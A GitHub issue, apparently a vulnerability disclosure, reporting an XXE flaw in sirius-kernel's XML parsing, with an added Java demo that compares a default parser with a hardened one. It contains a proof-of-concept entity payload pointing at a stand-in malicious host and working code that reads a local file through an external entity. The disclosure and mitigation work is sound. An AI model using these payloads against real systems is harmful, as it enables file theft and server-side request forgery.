
Potential XXE (XML External Entity injection) vulnerability in XMLStructuredInput.java #536

Open
JAckLosingHeart opened this issue Oct 19, 2024 · 0 comments

@JAckLosingHeart

Hi team, there might be a potential XXE vulnerability, but I'm not sure whether it's an actual risk or not; just creating an issue here for you to check.
On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38
function XMLStructuredInput()

An external XML is parsed with DocumentBuilder without security settings enabled:

        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        if (namespaceContext != null) {
            factory.setNamespaceAware(true);
        }
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document document = builder.parse(inputStream);

A malicious XML as input could be used to exploit the vulnerability. For example, they could craft a poc.xml like this:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]> 
<root>&xxe;</root>

to trigger an SSRF.

Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.

The fix recommendation would be to use the following features to disable DTDs or external entities:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
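The following is an added, self-contained demonstration of the issue above; it is not code from the issue or from sirius-kernel. It builds one DocumentBuilderFactory with the defaults described in the report and one with the hardening features listed in the fix recommendation (plus load-external-dtd, XInclude and entity expansion disabled), then feeds both the same payload. The payload has the shape of the reporter's poc.xml, but its SYSTEM entity points at a constructed temporary file rather than a remote URL so the example runs offline and shows the file-disclosure variant instead of the SSRF one. Class and method names (XxeDemo, vulnerableFactory, hardenedFactory, parseRootText) are my own; the code assumes Java 11 or later for Files.writeString.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class XxeDemo {

    // Mirrors the configuration quoted in the issue: stock factory, no hardening.
    // The JDK's built-in parser resolves external general entities by default.
    static DocumentBuilderFactory vulnerableFactory() {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        return factory;
    }

    // Hardened variant: the features from the fix recommendation, plus a few
    // more that close related doors (external DTD loading, XInclude, expansion).
    // disallow-doctype-decl alone rejects any document carrying a DOCTYPE,
    // which is what stops the payload below; the others are defence in depth.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Parses the document with the given factory and returns the text of the root element,
    // i.e. whatever the entity reference in <root>&xxe;</root> expanded to.
    static String parseRootText(DocumentBuilderFactory factory, String xml) throws Exception {
        DocumentBuilder builder = factory.newDocumentBuilder();
        try (InputStream in = new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))) {
            Document document = builder.parse(in);
            return document.getDocumentElement().getTextContent();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed "sensitive" file so the demo needs no network access;
        // on a real target this would be something like /etc/passwd.
        Path secret = Files.createTempFile("xxe-demo-", ".txt");
        Files.writeString(secret, "SECRET-VALUE-123");

        // Constructed payload: same structure as the issue's poc.xml, local file instead of a URL.
        String payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
                + "<root>&xxe;</root>";

        try {
            // Default factory: the entity is resolved and the file content leaks into the DOM.
            System.out.println("vulnerable: " + parseRootText(vulnerableFactory(), payload));

            // Hardened factory: the DOCTYPE is rejected before any entity is touched.
            try {
                parseRootText(hardenedFactory(), payload);
                System.out.println("hardened: parsed (unexpected)");
            } catch (SAXParseException e) {
                System.out.println("hardened: rejected -> " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run it with `javac XxeDemo.java && java XxeDemo`. The vulnerable line prints the temp file's contents inside the root element; the hardened line prints a SAXParseException about the disallowed DOCTYPE, which is the behaviour XMLStructuredInput should exhibit for untrusted input.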
